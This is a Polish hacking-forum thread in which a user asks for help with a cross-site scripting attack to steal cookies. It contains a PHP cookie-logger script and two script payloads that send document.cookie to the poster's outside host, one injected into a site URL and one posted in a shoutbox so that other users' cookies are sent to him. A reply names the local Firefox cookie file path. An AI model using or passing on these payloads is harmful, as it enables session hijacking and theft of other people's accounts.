Pokaż wyniki 1 do 3 z 3

Temat: XSS zapisywanie cookie

  1. #1
    Zarejestrowany
    Aug 2012
    Postów
    43

    Domyślnie XSS zapisywanie cookie

    Mam do Was pytanie, sugerowałem się tym poradnikiem. Owy kod:

    Kod php:
    <?

     

    $write 
    urldecode($_GET['zmienna']);
    $file fopen('xss.txt','w');

    fputs($file,$write);
    fclose($file);

    header ("Location: http://www.jakiesforum.pl/");

    ?>
    Zapisałem na moim serwerze FTP, nadałem mu chmod 777.

    Załóżmy, że mam swoją 'ofiarę', a jest nim strona jakiesforum.pl.
    W przeglądarce wpisuję

    http://www.jakiesforum.pl/index.php?id=<script>self.location.href='http://www.moja-strona.ugu.pl/b.php?zmienna='%2Bescape(document.cookie);<./script>
    No dobrze. Loguję się, patrzę FTP - nic nie mam.
    Myślę 'Może dopisać '<script>self.location.href='http://www.moja-strona.ugu.pl/b.php?zmienna='%2Bescape(document.cookie);<./script>' jak się zaloguję?'. Zalogowałem, dopisałem. Patrzę ftp - nie ma pliki 'xss.txt' z czym żadnych cookie.

    W przeglądarce wpisuję 'http://www.moja-strona.ugu.pl/b.php' - przenosi mnie do strony 'http://jakiesforum.pl'.

    To jak jest w końcu z tym przechwytywaniem cookie? Chciałem zrobić z siebie ofiarę, nic z tego nie wyszło.

    EDIT _ EDIT _ EDIT _ EDIT _ EDIT

    Pytanie dotyczące tego tematu.

    Po wpisaniu na shoutboxie kodu, np.

    Kod php:
    <script>
    window.open("http://www.jakastamstrona.pl/cookie.php?cookies="+document.cookie);
    </script> 
    Ma być on widoczny jako wiadomość wysłana czy nie? Po czym będę mógł poznać, że wszystko poszło zgodnie z planem (cookie użytkowników będą wysyłane na emaila)?
    Ostatnio edytowane przez czesuaf : 08-27-2012 - 22:26

  2. #2
    Zarejestrowany
    Jan 2009
    Postów
    836

    Domyślnie

    Po co przechwytywać cookies jak można pobrać dla FF z lokalizacji :

    C:\Documents and Settings\%USERNAME%\Dane aplikacji\Mozilla\Firefox\Profiles\xxx.default i tam będziesz miał plik o nazwie cookies
    katalog jest hidden <ukryty>

  3. #3
    Zarejestrowany
    Aug 2012
    Postów
    43

    Domyślnie

    Ponieważ jestem ciekaw takiej opcji jak podałem w pierwszym poście

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj